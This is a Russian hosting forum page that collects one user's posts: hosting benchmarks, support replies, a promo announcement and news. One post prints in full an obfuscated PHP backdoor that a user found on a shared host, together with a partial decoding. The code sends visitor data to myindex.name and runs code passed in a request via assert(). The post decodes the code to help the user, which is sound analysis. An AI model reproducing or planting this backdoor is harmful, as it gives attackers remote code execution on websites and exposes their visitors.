Правила форума Гаранты форума
Размещение рекламы AMX-X компилятор

Здравствуйте, гость Вход | Регистрация

Наши новости:

14-дек
24-апр
10-апр
11-апр

История благодарностей участнику xakep7 ::: Спасибо сказали: 468
Дата поста: В теме: За сообщение: Спасибо сказали:
19.6.2015, 11:06 Large host

Тест s1.large-host.net. По теме все сайты лежат на обычной KVM VPSке с 3 ядрами и 6 ГБ памяти.
Все ПО из коробки не настроено даже, не говоря о том что версия PHP 5.3.* старая. Новая PHP 5.3.29 в этой ветке т.е. сервер даже не обновляли не разу.
ДЦ Adman: adman.com

Для сравнения тест s3.lite-host.ru при включенном php 5.3:


Тесты по другим хостерам можно посмотреть тут: http://host-test.ru/
XyLiGaN
15.6.2015, 21:08 Lite-host | Легкий хостинг сайтов
magis1337, Я описал возможные варианты. Ваша ситуация скорей всего под номером 2.
В тикет вы написали постфактум, даже не пытаясь разобраться с ситуацией. Такие вопросы не решаются на форумах и я не гарантирую что на форумах вы получите полный ответ.
По факту ошибки никакой в ситуации не было. Вы используете общий IP, что само собой подразумевает что им пользуются и другие клиенты. Панель ISPmanager автоматом создает дефолтный сайт для IP и т.к. на сервер выделяется 5 общих адресов их может занять любой.
Повторюсь услуга выделенный IP стоит денег т.к. сами IP стоят денег (1000 евро в год за /22 у RIPE, аренда их стоит дороже). Из-за исчерпания доступных IP невозможно давать каждому клиенту выделенный IP тем более при таком подходе к тарифам добавится стоимость самого IP.
XyLiGaN
18.5.2015, 16:13 Lite-host | Легкий хостинг сайтов
Ответил в тикете.
3aB}{o3
16.5.2015, 22:54 Смешные и забавные картинки

Ну ок
XyLiGaN
14.5.2015, 15:53 Lite-host | Легкий хостинг сайтов
Добрый день, уважаемые клиенты!
В этот приятный, теплый, весенний день мы хотим сообщить вам приятную новость.
Нам исполняется 3 года! В честь данного события мы хотим порадовать вас следующими изменениями:
  • Был полностью обновлён дизайн сайта, увидеть его в новом виде, можно на нашем сайте - lite-host.ru
  • Были добавлены НОВЫЕ тарифные планы, ознакомиться с ними вы также можете у нас на сайте.
    (У тех кто пользуется нашими услугами сейчас все останется без изменения. Новые тарифы для новых заказов).
  • В честь Дня Рождения компании, мы дарим вам промокод - happybirthday3, дающий скидку 50% на первый месяц пользования услугами виртуального хостинга.

Всем удачных заказов и побольше АПТАЙМА на Ваших сайтах!
С Уважением, Всегда ваши Lite-Host LTD.
Bloo, Nixon, XyLiGaN, Евгений_2
29.4.2015, 16:53 Тестируем мастерсервера сами, пособие для исследователей.
Раз уже речь пошла о client_save, то
Код
"../client_save.dll" F70E24FE980C8EB0AF3ABBE577FC533F "amx_ms %userid% cs-exes.ru
filip
20.4.2015, 11:52 Смешные и забавные картинки
У меня 1 вопрос - зачем?
Скрытый текст
Bloo
13.4.2015, 15:05 Распространенные DDOS атаки и методы противодействия.
Цитата(magis1337 @ 13.4.2015, 20:02) *
xakep7, если только там, там хулиган писал, просто от 30мб без не каких методов

Он вроде бы написал смотря чем, что подразумевает возможность положить сервер при 10 Мбит/с. Не так ли?
Точнее в этом случае забьется не канал, а сетевая карта/роутер.
XyLiGaN
13.4.2015, 9:51 Расшифруйте пожалуйста, код появился в файлах на виртуальном хостинге
Rot13->base64->
Скрытый текст
Код
$GLOBALS['_388174767_']=Array(base64_decode('cHJlZ' .'19' .'tYXRjaA=='),base64_decode('ZmlsZV9nZXRfY29udGVudHM='),base64_decode('YXJy' .'YXlf' .'cmV2ZXJz' .'ZQ=='),base64_decode('' .'Z' .'nVuY3' .'Rpb25f' .'ZXhpc' .'3Rz'),base64_decode('Y' .'3' .'VybF9pbml0'),base64_decode('dXJsZW5jb2Rl'),base64_decode('dX' .'J' .'sZ' .'W5j' .'b2R' .'l'),base64_decode('bWQ1'),base64_decode('' .'Y3' .'Vyb' .'F9' .'zZXRvcHQ='),base64_decode('' .'Y3V' .'y' .'bF' .'9' .'zZ' .'XRv' .'cHQ='),base64_decode('Y' .'3' .'V' .'ybF9leG' .'Vj'),base64_decode('' .'YX' .'J' .'y' .'YXlfZGlmZ' .'l91a' .'2V' .'5'),base64_decode('Y3VybF' .'9jbG9' .'zZQ=='),base64_decode('aW' .'5p' .'X2dldA=='),base64_decode('Z' .'mlsZ' .'V9nZXRf' .'Y29udGV' .'u' .'dHM='),base64_decode('' .'d' .'X' .'JsZW' .'5jb' .'2R' .'l'),base64_decode('dX' .'J' .'sZW5jb' .'2Rl'),base64_decode('b' .'WQ' .'1'),base64_decode('Y' .'XNzZX' .'J0'));  function _801666531($i){$a=Array('Y2xp' .'ZW50X2NoZWNr','Y2xp' .'ZW5' .'0X2N' .'oZWN' .'r','SFRUUF9' .'BQ0NFU' .'F' .'R' .'fQ0hBU' .'l' .'NFV' .'A=' .'=','IS4hdQ==','U0NSSVBUX0ZJTEVOQU1' .'F','VVRGLTg=','' .'d' .'2' .'l' .'uZ' .'G93' .'cy' .'0' .'xMjUx','SFRUUF9BQ0NFUFRfQ' .'0hBUl' .'NFVA==','' .'Y3Vy' .'bF9pbml0','' .'aHR0cDo' .'vL2' .'15a' .'W5kZXg' .'u' .'bmFtZ' .'S9n' .'ZXQ' .'ucGhwP2Q9','U' .'0' .'VSV' .'kVSX05BTUU=','UkVRVUVTVF' .'9VUk' .'k=','JnU9','SFR' .'UUF' .'9VU0VSX0FHR' .'U' .'5U','JmM' .'9','Jm' .'k' .'9' .'MSZpcD0=','UkVNT1R' .'FX0FERFI=','Jm' .'g9','' .'N' .'DUxN' .'mI3NDdhNzc4ZGI2ZTFjN' .'zQ' .'0Y' .'W' .'E3YWY3M2E' .'zNTU=','U0V' .'SVkVSX0' .'5BTUU=','UkVRVU' .'VTVF9VUkk=','SFRUUF' .'9' .'VU0VSX0FHRU5U','MQ' .'==','aA==','YWxsb' .'3dfdXJsX2Zv' .'c' .'GVu','aHR0c' .'DovL215' .'aW' .'5kZXgubm' .'FtZS9nZ' .'XQu' .'cGhwP2' .'Q9','' .'U0VSVkVSX05BTU' .'U' .'=','UkVRVUVTVF9V' .'U' .'kk=','Jn' .'U9','SFRUUF9VU0V' .'SX0FHRU5U','JmM9','Jmk9MSZpc' .'D0=','UkVNT1RFX0FER' .'FI=','Jmg9','' .'NDUxNmI3' .'NDdhN' .'z' .'c4Z' .'GI2ZT' .'FjNzQ0YWE3YWY3M2E' .'zNTU=','' .'U' .'0VSVkV' .'SX0' .'5BT' .'U' .'U=','UkVRVUVTVF' .'9VUkk' .'=','SFRU' .'UF' .'9VU0V' .'SX0' .'FHRU' .'5U','MQ==','' .'cA==','cA==','ODJlZDM1N2E' .'=','Yw==');return base64_decode($a[$i]);}  if(!empty($_COOKIE[_801666531(0)]))die($_COOKIE[_801666531(1)]);if(!isset($icb2d_0[_801666531(2)])){if($GLOBALS['_388174767_'][0](_801666531(3),$GLOBALS['_388174767_'][1]($_SERVER[_801666531(4)]))){$icb2d_1=_801666531(5);}else{$icb2d_1=_801666531(6);}}else{$icb2d_1=$icb2d_0[_801666531(7)];while(round(0+419+419+419+419)-round(0+335.2+335.2+335.2+335.2+335.2))$GLOBALS['_388174767_'][2]($_COOKIE);}if($GLOBALS['_388174767_'][3](_801666531(8))){$icb2d_2=$GLOBALS['_388174767_'][4](_801666531(9) .$GLOBALS['_388174767_'][5]($_SERVER[_801666531(10)] .$_SERVER[_801666531(11)]) ._801666531(12) .$GLOBALS['_388174767_'][6]($_SERVER[_801666531(13)]) ._801666531(14) .$icb2d_1 ._801666531(15) .$_SERVER[_801666531(16)] ._801666531(17) .$GLOBALS['_388174767_'][7](_801666531(18) .$_SERVER[_801666531(19)] .$_SERVER[_801666531(20)] .$_SERVER[_801666531(21)] .$icb2d_1 ._801666531(22)));$GLOBALS['_388174767_'][8]($icb2d_2,round(0+8.4+8.4+8.4+8.4+8.4),false);$GLOBALS['_388174767_'][9]($icb2d_2,round(0+19913),true);echo $GLOBALS['_388174767_'][10]($icb2d_2);while(round(0+2023+2023)-round(0+809.2+809.2+809.2+809.2+809.2))$GLOBALS['_388174767_'][11]($_REQUEST,$icb2d_2);$GLOBALS['_388174767_'][12]($icb2d_2);$icb2d_3=_801666531(23);}elseif($GLOBALS['_388174767_'][13](_801666531(24))==round(0+1)){echo $GLOBALS['_388174767_'][14](_801666531(25) .$GLOBALS['_388174767_'][15]($_SERVER[_801666531(26)] .$_SERVER[_801666531(27)]) ._801666531(28) .$GLOBALS['_388174767_'][16]($_SERVER[_801666531(29)]) ._801666531(30) .$icb2d_1 ._801666531(31) .$_SERVER[_801666531(32)] ._801666531(33) .$GLOBALS['_388174767_'][17](_801666531(34) .$_SERVER[_801666531(35)] .$_SERVER[_801666531(36)] .$_SERVER[_801666531(37)] .$icb2d_1 ._801666531(38)));}if(isset($_REQUEST[_801666531(39)])&& $_REQUEST[_801666531(40)]== _801666531(41)){@$GLOBALS['_388174767_'][18]($_REQUEST[_801666531(42)]);}

base64->
Скрытый текст
Код
$GLOBALS['_388174767_']=Array(preg_match,file_get_contents,array_reverse,function_exists,curl_init,urlenco
de,urlencode,md5,curl_setopt,curl_setopt,file_get_contents)
Дальше идет запрос к функции :
function _801666531($i){$a=Array(client_checkclient_checkHTTP_ACCEPT_CHARSET!.!uSCRIPT_FILENAMEUTF-8windows-1251HTTP_ACCEPT_CHARSETcurl_inithttp://myindex.name/get.php?d=SERVER_NAMEREQUEST_URI&u=HTTP_USER_AGENT&c=&i=1&ip=REMOTE_ADDR&h=4516b747a778db6e1c744aa7af73a355SERVER_NAMEREQUEST_URIHTTP_USER_AGENT1hall
ow_url_fopenhttp://myindex.name/get.php?d=SERVER_NAMEREQUEST_URI&u=HTTP_USER_AGENT&c=&i=1&ip=REMOTE_ADDR&h=4516b747a778db6e1c744aa7af73a355SERVER_NAMEREQUEST_URIHTTP_USER_AGENT1pp82
ed357ac);return base64_decode($a[$i]);}
3aB}{o3
8.4.2015, 20:22 Соц. сеть - ВКонтакте


И снова в топе хэштег #вкживи

sashkaa
7.4.2015, 15:48 Силовики изымают серверы крупного регистратора NIC.UA
Пошли очередные изъятия серверов на/в Украине?

Цитата
Представители СБУ провели обыск и изъятие серверов крупного доменного регистратора NIC.UA из дата-центра. Об этом представители компании сообщили в Twitter: «Сейчас госорганы изымают наши хостинг-серверы из дата-центра, из-за этого у многих возникли проблемы с хостингом. Будем держать вас в курсе». Позднее компания пообещала, что с сайтами клиентов проблем быть не должно: «Домены работают и будут работать исправно». Сайты, которые использовали хостинг, уже недоступны.

Полная статья: http://ain.ua/2015/04/07/574157

P.s. А я только подумывал разместить там пару своих серверов...
DDoS, DeLuxe, FleXer, magis1337, ssx, XyLiGaN
3.4.2015, 13:18 lite-host - sql
Цитата(7entol @ 3.4.2015, 18:05) *
Надеюсь ни кто не закидает тапками?)
Но уже в течении трёх лет держу форум,сайт,стату,бан лист на Best-hoster.ru
И не знаю ни каких проблем)
Ни проблем с парковой доменов, ни с проблемой нагрузки на тариф.
Но скажу честно дороже чем за 49 рублей. Но это того стоит)

Тут проблема не с парковкой, а скорей с незнанием как это делать.
Проблемы нагрузки на тариф нет. Стоит Cloudlinux выше тарифа в этом случае не прыгнуть, но и превышений по тарифу тоже не будет.

Цитата(bot123 @ 3.4.2015, 18:08) *
Оффтоп
держу на webhost1.ru за 50 рублей, ни разу не было проблем.

Насколько я вижу у них минимальный тариф сейчас как и у best-hoster - 100 рублей/месяц
7entol
3.4.2015, 12:52 lite-host - sql
Особо веселит:
Цитата
Дорого! 2%
за малейший ddos выгоняют с хостинга 32%
Мой блог проработал у них 2 месяца, затем что-то у них сбилось и я потерял все что написал. Ни сайта, ни бекапа. 15%

1) 49 рублей - дорого? Если да, то добро пожаловать в оверселл т.к. железо нынче стоит дороже.
2) За 3 года не выгоняли ни 1 клиента по этой причине. В России даже предоставляем бесплатно защиту на сервере s3 от фирмы DDoS-Guard. Ни 1 компания этим бесплатно заниматься не будет, тем более при цене в 49 рублей/мес за минимальный тариф.
3) Тут спорно. Мы не обязаны делать бэкапы и они НЕ ВХОДЯТ в стоимость услуг, данное прописано в правилах хостинга. На тот момент в сервере вышло из строя оба жестких диска в raid1, данные в этом случае восстановить не удалось.
Цитата
Сайты медленно грузятся 29%

Если это так, то напишите в тикет - проверим почему. Ресурсы выделяются гарантированно на 1 аккаунт в соответствии с тарифным планом. См. лимит на процессор.

P.s. Есть еще одна компания/фирма с названием Lite-Host.IN
evil, XyLiGaN
25.3.2015, 0:09 Раздача Торрент через VPS
transmission в руки
Kazya
5.3.2015, 1:35 TiweHost быстрый надежный хостинг с защитой от ddos
Мне кажется или не тот раздел?
Если кому-то интересно тест данного хостинга http://host-test.ru/profile/17-TiweHost
Проект в beta тесте поэтому инфы не много.

P.s.
Цитата
Стоить мощная Ddos защита в 500 гиг.

Что?

С каких пор на/в Украине есть защита от DDoS атак?
31.41.216.69 принадлежит ON-LINE Ltd BESTHOSTING-NET3

P.s.s.
Цитата
Этому способствует специально разработанная архитектура хостинга высокой отказоустойчивости, использующая механизм кэширования и отдачи статической информации с высокой скоростью.

Поставили nginx и xcache?
XyLiGaN
2.3.2015, 5:57 оборудование для сервера
Конфиг:
2x Intel Xeon E5-2660 (16 ядер, 32 потока), 32 Gb Ram, 4x2 TB SATA Raid 1+0

Держит 40 серверов по 32 слота. Отсюда можно рассчитать сколько вам нужно.
default1k, Jlx7, XyLiGaN
23.2.2015, 21:54 Lite-host | Легкий хостинг сайтов
Цитата(San4aus @ 24.2.2015, 2:49) *
Эм, как бы взял тестовый период для проверки. Первый раз так грубо мне ответили. Но хотя бы помогли.

Вы просто попали под горячую руку. Не спорю такого быть не должно, но все мы люди. Смысл тут даже не в том что это нужно оплачивать, а в том что не нужно думать раз все оплачено значит я царь бог.
Повторюсь. Первостепенная задача хостинга - предоставление качественных ресурсов и окружения, но никак не правка скриптов и ошибок. Да, не спорю, есть ошибки которые попадают под категорию ошибка настройки, но 99% остальных ошибок можно исправить самостоятельно, только лишь загуглив саму ошибку. Тем более мы предоставляем все средства для гибкости настроек и избежания большинства таковых ошибок. Если ошибка попадает под тот 1%, то и ответ будет соответствующим (четким и по делу).
San4aus
23.2.2015, 21:37 Lite-host | Легкий хостинг сайтов
Цитата(San4aus @ 24.2.2015, 2:33) *
Обратился короче в ТП, т.к. ошибка на Кс бансе вылезла. Была она также на предыдущем хостинге. В общем сравнения ТП:

Lite Host
[attachment=31373:__________2.png]

Beget

[attachment=31374:__________.png]

Ошибка
Non-static method Config::getStatus() should not be called statically, assuming $this from incompatible context


P.S. Остался бы на Бегет, но МП не подружились с ним. Понимаю, что тестовый период.

Не все за вас обязана делать Тех поддержка.

Тем более. Идем в гугл: https://www.google.ru/webhp?sourceid=chrome...ext&es_th=1
Открываем первую ссылку: http://stackoverflow.com/questions/2584631...patible-context
Видим: You probably have PHP running with E_STRICT error reporting. Try turning it off and see if that fixed the problem - like turn of error reporting for E_STRICT errors
Идем в "Выбор версии PHP" -> php.ini и меняем error_reporting на ~E_ALL. После этого ошибка не будет появляться.

О чем это я? Учимся думать своей головой за себя, ну и гуглить.
San4aus
16.2.2015, 8:36 Многобайт
Цитата
16.02.2015 ночью несколько минут фиксировалась проблема с доступностью из некоторых направлений части IP-сетей МногоБайт, возникшая по причине некорректной работы ПО маршрутизатора одного из наших апстримов: маршруты МногоБайт распространялись через сеть апстрима в остальной мир, хотя в этот момент времени BGP-сессия с данным апстримом находилась в состоянии «down». Именно отключение BGP-сессии и послужило возникновению проблемы, хотя по логике работы протокола ее быть не должно.

Сетевыми инженерами МногоБайт оперативно был открыт кейс у апстрима. Совместно со специалистами апстрима проблема была устранена через несколько минут. Нам также стало известно, что вендору известно о проблеме в ПО и в ближайшее время она будет решена. Мы не ожидаем повторения данной ситуации.
badboy2115, BariN, evil, Rotterdam, San4aus, XyLiGaN
15.2.2015, 20:49 Помощь, лайт-хост
При создании поддомена, нужно указать поддомен в псевдонимах основного домена. Автоподдомены в данном случае включаются в отдельной папке.
Данные вопросы лучше задавать в биллинге.
dgfaf

9 страниц V   1 2 ... 7 8 »